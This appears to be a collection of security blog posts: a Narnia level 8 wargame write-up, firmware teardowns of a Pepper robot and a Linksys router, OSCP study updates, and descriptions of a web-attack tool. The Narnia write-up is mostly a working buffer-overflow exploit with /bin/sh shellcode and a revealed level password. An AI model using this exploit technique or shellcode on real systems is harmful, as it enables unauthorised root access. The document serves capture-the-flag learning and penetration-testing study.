cat narnia8.c

The key to this challenge is a buffer overflow.
Notice that the program takes our argument as blah (without any size limitations), and sets bok (with a size of 20 bytes) to the contents of blah. This clearly shows the possibility of a buffer overflow.

Disassembling the program:
gdb -q ./narnia8
disas func

Understanding the program:
br *func+122
r $(python -c ‘print “a” * 20’)
x/50x $esp

Notice the address 0xffffd8a5 appears twice. This is potentially blah’s address. Remember that bok equals to blah.
The return address (which we want to overwrite) must then be 0x080484cd
Let us repeat the process and confirm.

Confirming the theory:
r $(python -c ‘print (“a” * 20) + (“b” * 4) + (“c” * 4)’)
x/50x $esp

Notice that the theory appears to be right. Performing an overflow actually overwrote the first instance of the blah address.

Also notice that the address of blah changed, now to: 0xffffd89d

In order to be able to overwrite the return address (0x080484cd), we are going to have to overwrite blah with itself.

Testing the blah overwrite theory:
r $(python -c ‘print (“A” * 20) + (“\x9d\xd8\xff\xff”)’)
x/50x $esp

The address changed, so let’s try again with the new address.

r $(python -c ‘print (“A” * 20) + (“\xa1\xd8\xff\xff”)’)
x/50x $esp

Success. Notice that our offset is then 12 words in.

Confirming the overwrite method:
r $(python -c ‘print (“a” * 20) + “\xa1\xd8\xff\xff” + (“a” * 12) + (“b” * 4)’)
x/50x $esp

We have to try again with the new address.

r $(python -c ‘print (“a” * 20) + “\x91\xd8\xff\xff” + (“a” * 12) + (“b” * 4)’)
x/50x $esp

Success! We have overwritten the return address with our b’s.

To make life easier for ourselves, we will use shellcode injection via environment variables to store our shellcode.
We will also use a C program to determine the location of our shellcode (SC).

Before we do that, however, we will first simulate this technique within GDB.
We will go through the process again in order to determine the new addresses.
Since our SC is 25 bytes long, our fake SC will be 25 bytes long as well.

Simulating our environment variable technique within GDB:
set env EGG=AAAAAAAAAAAAAAAAAAAAAAAAA
r $(python -c ‘print “A” * 20’)
x/50x $esp

Notice the address of blah: 0xffffd887

r $(python -c ‘print (“A” * 20) + “\x95\xdf\xff\xff” + (“A” * 12) + “\xfe\xca\xbe\xba”‘)
x/50x $esp

We have to try again with the new address.

r $(python -c ‘print (“A” * 20) + “\x81\xdf\xff\xff” + (“A” * 12) + “\xfe\xca\xbe\xba”‘)
x/50x $esp

Success.

Now, we’ll run the program outside of GDB to note the size of the difference inside and outside of GDB.
This is important in order to choose the proper address to deliver the final working exploit.

Determining the blah address outside of GDB:
env -i PWD=”/games/narnia” SHLVL=0 EGG=$(python -c ‘print(“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80”)’) /narnia/narnia8 $(python -c ‘print “A” * 20’) | xxd

Inside GDB    –    Outside GDB    =
————————————————–
ffffdf9b        –    ffffdf95        = 6

New blah address
—————————————
ffffdf81     +    6    = ffffdf87

Creating a program to determine the address of our shellcode inside the environment variable:
cd tmp
vi gev.c
gcc gev.c -o getenvaddr

Running the program:
cd /narnia
env -i PWD=”/games/narnia” SHLVL=0 EGG=$(python -c ‘print(“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80”)’) /tmp/getenvaddr EGG /narnia/narnia8

The SC address is: ffffdfce

Running the exploit:
env -i PWD=”/games/narnia” SHLVL=0 EGG=$(python -c ‘print(“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80”)’) /narnia/narnia8 $(python -c ‘print (“a” * 20) + “\x87\xdf\xff\xff” + (“b” * 12) + “\xce\xdf\xff\xff”‘)

Grabbing the flag:
cat /etc/narnia_pass/narnia9

Flag: eiL5fealae

Techniques used: Local buffer overflow; shellcode injection via environment variables

 

Level 9

Solution:

Receiving congratulations:

Note: The above doesn’t comment doesn’t apply anymore, as write-ups are spread out all over the web!
Note to creators: Let me know if otherwise, and I will take the write-up down. Thanks for the fun!

Softbank Pepper: A short robot overview

Device: Softbank Pepper
Device Type: Humanoid Robot
Firmware: NAOqi System 2.5.5

From the website’s product description:
Pepper is an autonomous talking humanoid robot who perceives emotions, and adapts his behavior to the mood of the humans around him. Pepper can identify joy, sadness, anger or surprise and respond appropriately, making his interactions with humans incredibly natural and intuitive.

Purpose:
Analyze firmware image and extract data in order to search for bugs and vulnerabilities.

Link to download firmware: https://developer.softbankrobotics.com/us-en/downloads/pepper

Download the firmware from the Universal Robots website:
https://developer.softbankrobotics.com/us-en/downloads/pepper

Running the commands “strings” and “hexdump” to extract data:
strings -n 10 pepper-x86-2.5.5.5_2016-11-28.opn > strings.out
hexdump -C pepper-x86-2.5.5.5_2016-11-28.opn > hex.out

Analyzing the strings.out file:

Note we are dealing with a Linux Gentoo-based OS.
Screenshot taken for the lulz, “chest-harakiri”.

About NAOqi OS:
The NAOqi OS documentation can be found here: http://doc.aldebaran.com/2-1/dev/tools/opennao.html

Note that the default passwords are:

This is important because, unfortunately, as with other IoT devices, most users don’t change the default password.

NAOqi OS is currently used for both the Pepper and NAO robots.

The robot can be connected to via a web browser, SSH, and FTP. Gotta pwn them all!

In the wild:
Softbank sells Pepper for personal use and for business. In fact, some airports, banks, and stores are already using Pepper and report increases in sales.

Source: JapanTimes

Running “binwalk” to further analyze the image:

We get information about the bootloader, and the use of other services such as MySQL and Lancom WWAN.

Have fun. 🙂

Reverse Engineering Firmware: Linksys WRT1900AC

Device: Linksys WRT1900AC
Device Type: Router
Firmware: Ver. 2.0.8.177401

Purpose:
Analyze firmware image and extract data in order to search for bugs and vulnerabilities.

Link to Firmware Download:
http://www.linksys.com/pl/support-article?articleNum=148550

Download the firmware from the Linksys website:
http://www.linksys.com/pl/support-article?articleNum=148550

Running the commands “strings” and “hexdump” to extract data:
strings -n 10 FW_WRT1900ACv2_2.0.8.177401_prod.img > strings.out
hexdump -C FW_WRT1900ACv2_2.0.8.177401_prod.img > hex.out

Analyzing the strings.out file:

Notice the references to Linux, Marvell Armada 385 and JFFS2.

Running “binwalk” to further analyze the image:

Important files:
26736    : The kernel
6291456    : The filesystem

Extracting the kernel and the file system with “dd”:
dd if=FW_WRT1900ACv2_2.0.8.177401_prod.img bs=1 skip=26736 of=kernel.gz
dd if=FW_WRT1900ACv2_2.0.8.177401_prod.img bs=1 skip=6291456 of=wrt1900ac.jffs2

Decompress the .gz file:
gzip -d kernel.gz

Running the commands “strings” and “head” to preview the kernel data:
strings strings.out | head -10

Running “binwalk” to further analyze the kernel:

Have fun. 🙂

Officially OSCP Certified

Today I received the wonderful news that I passed the Offensive Security Certified Professional (OSCP) examination and I am now an OSCP. It was definitely the highlight of the day.

The examination consisted of a 24-hour limited to root/system five different machines. After this, you had to submit a penetration test report, and optionally, a lab and course report.

The labs consisted of over 50 machines and various subnets, and came along with the Penetration Testing with Kali Linux (PWK) course and one exam attempt.

I ended up owning 32 machines in the labs and gaining access to the subnets. Although I paid for the 90 days option, I was able to complete everything within 60 days. Having said that, I still recommend the 90 days option as a precaution.

My plan for the exam was the same as for the labs, which you can find here.

The battle plan was as follows:

• Write the report as I go along
• Pick the low hanging fruit first
• Take a break whenever I feel a machine is “too hard”
• Avoid using Metasploit
• Build/execute attack tools/exploits that I can reuse
• Identify the attack vectors and determine which is best, before compromising the system; the best being a balance between reliability, speed, and efficiency
• Have fun; take a break when things don’t feel very fun anymore

This battle plan worked perfectly for me for both the labs and the exam. With regards to the scripts I wrote, you can find some of them scattered throughout my Github page.

I wrote many little (but very useful) intelligence gathering scripts and many exploit ports to Python. In the Github you will find the intel gathering scripts along with other goodies, though not the particular exploit scripts.

The journey was extremely fun and very rewarding. As many others have stated, one learns the value of proper enumeration/intelligence gathering. A great additional for me was learning about KeepNote, which is a great EverNote-like software available in Kali Linux. Thanks to journey not only did I learn a lot in the technical realm, but also in the report-writing realm. Expect my future write-ups to include proper explanations and screenshots.

I am now officially OSCP certified, and officially looking for penetration testing jobs and other offensive security positions. If you feel you can help me land a job, feel free to reach out! The beer’s on me.

I tried harder.

 

Tuoni Web Attacking Program and Cryptan Cryptography Suite

I have been working on two public projects in Python.

The first, Tuoni, is a web attacking program.

Tuoni currently has the following capabilities:

• Shellshock attack
• Directory fuzzer
• Session hijacker
• Get robots.txt file
• Test file upload ability
• Whois lookups
• Zone transfers
• Web spidering
• Banner grabbing

The second, Cryptan, is a cryptography suite.

Cryptan currently has the following capabilities:

* Format conversion: Hex, Ascii, Decimal, Octal, Binary
* XOR Encryption/Decryption
* Caesar Cipher Encryption/Decryption
* Caesar Cipher Brute-force Decryption
* Single Byte XOR Decryption
* Single Character XOR Detection & Decryption
* Repeating-Key XOR (Vigenere) Decryption
* AES-ECB Detection
* AES-ECB Decryption
* PKCS#7 Padding
* AES-CBC Decryption

Tuoni is a great tool for the first stages of information gathering. With it, you can discover directories, test for the ability of uploading files (which can lead to uploading a reverse shell), and also attempt a shellshock attack and session hijacking.

Cryptan is a great tool for your cryptography needs. Most wargames and capture the flags include cryptography challenges that involve Cryptan’s functionalities in one way or another. For real-life testing, most devices actually have very basic cryptography implementations, so Cryptan can easily decrypt whatever it is they are trying to encrypt.

These are open-ended projects. There is still much to add. As is, they work great.

 

OSCP: Nine Days In, 21 Machines Rooted

It has been nine days since I started the OSCP labs.

I have been having a ton of fun, and have compromised 21 machines so far.

I have been following the battle plan I established when I started the labs, and it was been working beautifully. So that being said, I recommend others considering taking the OSCP to follow my strategy. It has allowed me to have a lot of fun, minimize stress, and learn a ton.

Before starting the OSCP journey, I used to go into CTFs and war games and try out the most common attack vectors (which isn’t such a bad tactic) and just kept on attacking. Now, I have learned the value of proper enumeration and understanding the underlying services and systems. If before my weapon of choice was the machine gun, now it is the sniper rifle. Of course, both have their uses.

Onwards and upwards.

OSCP: Done with the course, Unto the Labs

Two days ago, I completed the PWK course along with the proper reporting of the challenges. The course was a nice introduction to what it takes to perform a penetration test, and it served as a good base to build on with the experience in the labs.

I started the OSCP labs yesterday. I have put in around four hours so far, and I have been able to root three machines already. I am close to rooting another two, having already compromised them, and I plan on “dealing the killing blow” later today. I actually started off by performing a network-wide intelligence-gathering effort. This expedites my attacks going forward, as I have a good information base with which to proceed.

My plan going into the labs is as follows:

• Write the report as I go along
• Pick the low hanging fruit first
• Take a break whenever I feel a machine is “too hard”
• Avoid using Metasploit
• Build/execute attack tools/exploits that I can reuse
• Identify the attack vectors and determine which is best, before compromising the system; the best being a balance between reliability, speed, and efficiency
• Have fun; take a break when things don’t feel very fun anymore

I will keep you updated on my progress.